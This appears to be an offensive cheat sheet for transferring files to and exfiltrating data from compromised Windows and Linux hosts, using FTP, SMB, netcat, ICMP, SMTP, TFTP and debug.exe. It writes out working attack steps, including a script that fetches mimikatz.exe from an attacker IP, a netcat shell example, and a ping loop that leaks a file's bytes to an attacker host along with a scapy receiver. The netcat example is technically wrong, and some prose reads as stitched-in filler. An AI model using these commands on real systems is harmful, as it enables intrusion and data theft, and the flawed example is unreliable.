```bash
#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
```
Windows client
```batch
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
```
SMB
Kali as server
```bash
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
```
Or create an SMB share using samba:
```bash
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
```
Windows
Exfiltration
Exfiltration is the unauthorized transfer of data from a target system. Attackers use various techniques to exfiltrate data, such as:
- Compression: Attackers compress data before exfiltrating it to reduce its size and avoid detection.
- Encryption: Data is encrypted to prevent unauthorized access during exfiltration.
- Steganography: Attackers hide data within other files to avoid detection.
- Exfiltration over Alternative Protocols: Attackers use protocols like DNS or ICMP to exfiltrate data, bypassing traditional security controls.
- Exfiltration over Command and Control Channels: Attackers use existing command and control channels to exfiltrate data, making it harder to detect.

To prevent exfiltration, organizations can implement measures such as:
- Network Segmentation: Segregating networks to limit the movement of attackers within the network.
- Data Loss Prevention (DLP) Solutions: Monitoring and preventing unauthorized data transfers.
- Network Traffic Analysis: Monitoring network traffic for signs of exfiltration attempts.
- User Training: Educating users about the risks of data exfiltration and how to recognize and report suspicious activities.
By understanding exfiltration techniques and implementing appropriate security measures, organizations can better protect their data from unauthorized access and leakage.
```batch
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
```
The nc command, also known as Netcat, is a versatile networking tool that can be used for various purposes during a penetration test. It can be used for port scanning, banner grabbing, transferring files, and establishing reverse shells. Netcat operates by establishing a connection between a client and a server, allowing for data transfer between the two.
Usage
To establish a connection with a remote server using nc, you can use the following command:
```bash
nc <remote_server_ip> <port>
```
To listen for incoming connections on a specific port, you can use the following command:
```bash
nc -l -p <port>
```
Example
Establishing a reverse shell using nc:
```bash
# Attacker machine:
nc -l -p 1234 -e /bin/bash
# Victim machine:
nc <attacker_ip> 1234
```
This will establish a reverse shell from the victim machine to the attacker machine, allowing the attacker to execute commands on the victim's system.
```bash
# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will send 4 bytes per ping packet (you could probably increase this up to 16)
```
```python
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 0:
            data = pkt[ICMP].load[-4:] #Read the 4 interesting bytes
            print(f"{data.decode('utf-8')}", flush=True, end="")

sniff(iface="tun0", prn=process_packet)
```
SMTP
If you can send data to an SMTP server, you can create an SMTP server to receive the data with python:
```bash
sudo python -m smtpd -n -c DebuggingServer :25
```
TFTP
Installed by default on XP and 2003 (on other operating systems it needs to be added explicitly during installation).
In Kali, start the TFTP server:
```bash
#I didn't get these options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/to/nc.exe /tftp
```
Visual Basic Scripting Edition (VBScript) is a scripting language developed by Microsoft. It is commonly used for writing scripts to automate tasks on Windows operating systems. VBScript can be used for exfiltration by reading data from files, registry keys, or other sources and sending it to an external server.
Exfiltration Techniques
1. File Transfer
VBScript can be used to read the contents of a file and send it to an external server using HTTP or other protocols.
To detect and prevent exfiltration using VBScript, monitoring network traffic for suspicious outbound connections, restricting VBScript execution in enterprise environments, and implementing endpoint security solutions can be effective measures.
The debug.exe program not only allows the inspection of binaries but also has the ability to rebuild them from hexadecimal. This means that by providing the hexadecimal of a binary, debug.exe can generate the binary file. However, it is important to keep in mind that debug.exe is limited to assembling files of up to 64 KB in size.
```bash
# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt
```
Then copy and paste the text into the Windows command window and a file called nc.exe will be created.